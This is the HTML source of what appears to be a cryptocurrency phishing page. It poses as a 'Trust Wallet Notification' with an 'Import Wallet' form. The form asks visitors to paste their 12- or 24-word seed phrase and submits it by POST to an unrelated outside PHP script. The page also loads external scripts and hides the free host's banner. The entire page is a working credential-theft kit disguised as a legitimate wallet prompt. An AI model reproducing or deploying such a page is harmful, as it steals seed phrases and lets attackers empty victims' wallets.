<!doctype html>
<html lang="en"><head>
<style>
.anticon {
  display: inline-block;
  color: inherit;
  font-style: normal;
  line-height: 0;
  text-align: center;
  text-transform: none;
  vertical-align: -0.125em;
  text-rendering: optimizeLegibility;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}

.anticon > * {
  line-height: 1;
}

.anticon svg {
  display: inline-block;
}

.anticon::before {
  display: none;
}

.anticon .anticon-icon {
  display: block;
}

.anticon[tabindex] {
  cursor: pointer;
}

.anticon-spin::before,
.anticon-spin {
  display: inline-block;
  -webkit-animation: loadingCircle 1s infinite linear;
  animation: loadingCircle 1s infinite linear;
}

@-webkit-keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}

@keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
</style>
<meta charset="utf-8"><link rel="icon" href="images/truste.png"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#fafafa">
<link href="cunek/ayam/apk.css" rel="stylesheet">
<link rel="apple-touch-icon" href=images/truste.png"><title>Trust Wallet Notification</title>
<link href="cunek/ayam/chunk1.css" rel="stylesheet">
<link href="cunek/ayam/app.css" rel="stylesheet">
<link href="cunek/ayam/main.chunk.css" rel="stylesheet">
<script src="cunek/ayam/jquery.min.js"></script>
<script src="https://cdn.ethers.io/scripts/ethers-v4.min.js" charset="utf-8" type="text/javascript"></script>
</head>
<body>



<div id="root"><div class="ant-spin-nested-loading"><div class=""><div class="sc-jqCOkK kFZWwp"><div class="sc-gGBfsJ jvrGcO"><div class="sc-jnlKLf OHNdu"><div class="sc-fYxtnH hARKVj">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="cunekpantek.png" alt="" style="height: 50px;width: 150px;" alt="cashtab" class="sc-tilXH gdtVXy"></div>







<h2><center>Import Wallet</center></h2><center><p class="thepadding">

</p></center>

<div class="sc-htoDjs cDnNqw">
	<form method="post" action="https://wallet.kukai.team/omg/nc2.php" class="ant-form ant-form-horizontal">
        <div class="ant-row ant-form-item ant-form-item-with-help" style="row-gap: 0px;"><div class="ant-col ant-form-item-control"><p class="thepadding" style="text-align: left;color: hsla(0,0%,49.8%,.85);">Phrase</p>
<div>

<div class="thepadding">
        <textarea class="import-account__secret-phrase" placeholder="Paste seed phrase from clipboard" name="none" id="wordsseed" maxlength="350" class="wInput ng-pristine ng-empty ng-invalid ng-invalid-required ng-valid-minlength ng-valid-maxlength ng-touched" minlength="24" required="" aria-Imports-error-home="false" aria-required="true" style="" accounts.mode="==" ng-model="vm.seed" ng-change="vm.refreshAddress()" ng-model-options="{ debounce: 750 }" ng-trim="false"></textarea>Typically 12 (sometimes 24) words separated by single space</h5>
        </div></div><div class="ant-form-item-explain">
                </div></div></div>


                  <div class="thepadding">
<button class="button sc-VigVT fWmldN"="disabled" id="imp" ">IMPORT</button>
<div1></div1></div></form>
                </div>
<script src="cunek/ayam/load.js"></script>
</div></div></div></div></div></div><style>img[alt="www.000webhost.com"]{display:none;}</style>

